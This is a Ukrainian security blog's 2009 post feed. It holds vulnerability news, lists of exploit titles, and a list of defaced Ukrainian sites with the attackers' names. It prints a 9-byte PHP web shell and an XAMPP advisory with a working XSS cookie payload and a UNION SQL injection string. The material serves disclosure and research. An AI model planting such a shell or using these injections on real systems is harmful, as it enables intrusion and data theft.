22:44 23.07.2009
Нещодавно була виявлена уразливість в Adobe Flash, що дозволяє виконання довільного коду. Для якої був розроблений експлоіт.
Даний експлоіт представляє собою робочий вірус (malware). Атака відбувається через флешку включену в pdf-файл.
- Adobe Flash (Embedded in PDF) LIVE VIRUS/MALWARE Exploit (деталі)
Опубліковано в Експлоіти, Новини | Без Коментарів »
20:25 23.07.2009
Виявлені численні уразливості безпеки в Mozilla Firefox
Уразливі версії: Mozilla Firefox 3.0, Firefox 3.5.
Численні пошкодження пам’яті, міжсайтовий доступ, цілочисленні переповнення, переповнення буфера. Всього шість критичних уразливостей та одна високого рівня ризику.
- Mozilla Foundation Security Advisory 2009-34 (деталі)
- Mozilla Foundation Security Advisory 2009-35 (деталі)
- Mozilla Foundation Security Advisory 2009-36 (деталі)
- Mozilla Foundation Security Advisory 2009-37 (деталі)
- Mozilla Foundation Security Advisory 2009-39 (деталі)
- Mozilla Foundation Security Advisory 2009-40 (деталі)
- Mozilla Foundation Security Advisory 2009-41 (деталі)
Опубліковано в Новини, Помилки | Без Коментарів »
16:14 23.07.2009
В даній добірці експлоіти в веб додатках:
- CMS NetCat <= 3.12 Multiple Remote Vulnerabilities (деталі)
- CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit (деталі)
- phpLD 3.3 (page.php name) Blind SQL Injection Vulnerability (деталі)
- PHPmotion <= 2.1 CSRF Vulnerability (деталі)
- Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability (деталі)
- Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability (деталі)
- StormBoard 1.0.1 (thread.php id) SQL Injection Vulnerability (деталі)
- Getleft 1.2 Remote Buffer Overflow Proof of Concept (деталі)
- phpEmployment (php upload) Arbitrary File Upload Vulnerability (деталі)
- phpAdBoard (php uploads) Arbitrary File Upload Vulnerability (деталі)
- phpGreetCards XSS/Arbitrary File Upload Vulnerability (деталі)
- PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit (деталі)
- Joomla Component 5starhotels (id) SQL Injection Exploit (деталі)
- Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln (деталі)
- Easyecards 310a Exploit (деталі)
Опубліковано в Експлоіти | Без Коментарів »
22:44 22.07.2009
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
- http://www.yun-press.kiev.ua (хакером Cyber_945)
- http://tbs-pvp.org.ua (хакерами з ISLAMIC GHOSTS TEAM) - похакана директорія сайта
- http://blog.djmagazin.com.ua (хакерами з ISLAMIC GHOSTS TEAM)
- http://debts.com.ua (хакером CodexT-Piiz HacKer) - 28.06.2009, зараз сайт вже виправлений адмінами
- http://www.freefat.com.ua (хакерами з Azerbaijan Attacker Team) - 16.07.2009, зараз сайт вже виправлений адмінами
Опубліковано в Новини сайту, Дослідження | Без Коментарів »
19:36 22.07.2009
16.07.2009
Thierry Zoller виявив DoS уразливість в багатьох браузерах та системах.
Уразливі продукти: Microsoft Internet Explorer 5, 6, 7, 8 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Mozilla Firefox 3.0, Opera 9.63, а також Chrome, Seamonkey, Midbrowser, Netscape, Konqueror та інші браузери та системи, в тому числі поштові клієнти (що використовують браузерні движки) та браузери для мобільних пристроїв і приставок.
Метод select() не обмежує кількість обраних елементів, що приводить до вичерпання ресурсів.
- One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3 (деталі)
22.07.2009
Додаткова інформація.
- Update: [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3 (деталі)
Опубліковано в Новини, Помилки | 2 Коментарів »
16:23 22.07.2009
В даній добірці уразливості в веб додатках:
- Borland Interbase 2007 Integer Overflow (деталі)
- Homes 4 Sale Remote XSS Vulnerabilitiy (деталі)
- Pligg Auto-Voter Using XSS to Bypass CSRF Protection (деталі)
- NeBoard Sql Injection Vulnerability (деталі)
- SAP Web Application Server XSS Security Vulnerability (деталі)
- CA Products That Embed Ingres Multiple Vulnerabilities (деталі)
- MyClan Sql Injection (деталі)
- PHP-NUKE module Kleinanzeigen SQL injection (lid) (деталі)
- Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities (деталі)
- IGES CMS <=2.0 Multiple Vulnerabilities (деталі)
Опубліковано в Уразливості | Без Коментарів »
22:43 21.07.2009
Після того як я розмістив на сайті свій MustLive Remote Shell, який є достатньо малим шелом (і якщо прибрати коментарі та додаткові echo, що я додав для красивого вигляду програми, то її код буде в один рядок), poma в коментярях привів ще більш короткий шел на PHP. Умовами роботи якого є включені short_open_tag та register_globals.
PHP Shell:
<?=@`$c`;
Цей шел займає всього 9 байт. І це самий маленький PHP-шел серед мені відомих. Якщо вам відомий ще менший шел, то не соромтеся навести його в коментарях
.
Такі маленькі шели як MustLive Remote Shell та Poma’s Shell можуть знадобитися при дослідженні Code Execution уразливостей на сайтах. Особливо у тому випадку, якщо є обмеження на розмір коду, коли можна на сайт завантажити лише файли невеликого розміру, або у випадку Code Execution уразливостей, що дозволяють виконувати PHP-код через параметри скрипта (і при цьому є обмеження на розмір даних, що передаються в даному параметрі). Бо коли немає таких обмежень, то можна використати повнофунціональний шел
(з більшими можливостями, але й більшим розміром файла).
Опубліковано в Новини сайту, Програми | 5 Коментарів »
19:25 21.07.2009
15.06.2009
У червні, 11.06.2009, я знайшов Insufficient Authentication, Cross-Site Scripting та SQL Injection уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.
Нещодавно я вже писав про численні уразливості в XAMPP.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
21.07.2009
Insufficient Authentication:
http://site/xampp/
Зустрічаються сайти, де доступ да адмінки XAMPP не обмежений паролем.
XSS:
POST запит на сторінці http://site/xampp/adodb.php
"><script>alert(document.cookie)</script>В полях: Database server, Host, Username, Password, Current database, Selected table.
SQL Injection:
Атака відбувається при доступі в адмінку XAMPP - через вищезгадану Insufficient Authorization уразливість, або через знайдену раніше Insufficient Authorization уразливість.
На сторінці http://site/xampp/adodb.php
cds where 1=0 union select version(),0,0,0В полі Selected table.
Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).
Опубліковано в Уразливості | Без Коментарів »
16:09 21.07.2009
В даній добірці експлоіти в веб додатках:
- PHPg 1.6 (XSS/PD/DoS) Multiple Remote Vulnerabilities (деталі)
- Joomla Component com_tophotelmodule 1.0 Blind SQL Injection Vuln (деталі)
- Joomla Component com_hbssearch 1.0 Blind SQL Injection Vuln (деталі)
- BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability (деталі)
- Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit (деталі)
- Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability (деталі)
- RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability (деталі)
- SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit (деталі)
- Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability (деталі)
- YourPlace <= 1.0.2 Multiple Remote Vulnerabilities + RCE Exploit (деталі)
- Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit (деталі)
- RoundCube Webmail <= 0.2b Remote Code Execution Exploit (деталі)
- REDPEACH CMS (zv) Remote SQL Injection Vulnerability (деталі)
- Calendar Script 1.1 (Auth Bypass) SQL Injection Vulnerability (деталі)
- EasyPublish 3.0tr Exploit (деталі)
Опубліковано в Експлоіти | Без Коментарів »
20:33 20.07.2009
Як повідомляється на zdnet.com в записі ImageShack hacked by anti-full disclosure movement - сервіс ImageShack був похаканий так званим “рухом проти full disclosure”. Цей взлом відбувся на позаминулі вихідні.
ImageShack є одним з найбільш популярних безкоштовних хостінгів зображень. І після його взому мільони зображень редиректили на одне зображення, в якому повідомлялося про причини взому ресурсу.
Анти-секюріті група відповідальна за цей взлом назвала себе “рухом призначеним для знищення full disclosure”. І вона висловила погрозу тим секюріті веб сайтам і спільнотам, що оприлюднують експлоіти в full disclosure манері.
Ось так у full disclosure з’явилися противники. Побачимо як події будуть розгортатися далі. Про різні типи оприлюднень уразливостей я писав в своїй статті Хакінг веб сайтів, секюріті дослідження, оприлюднення та законодавство.
Опубліковано в Новини | 4 Коментарів »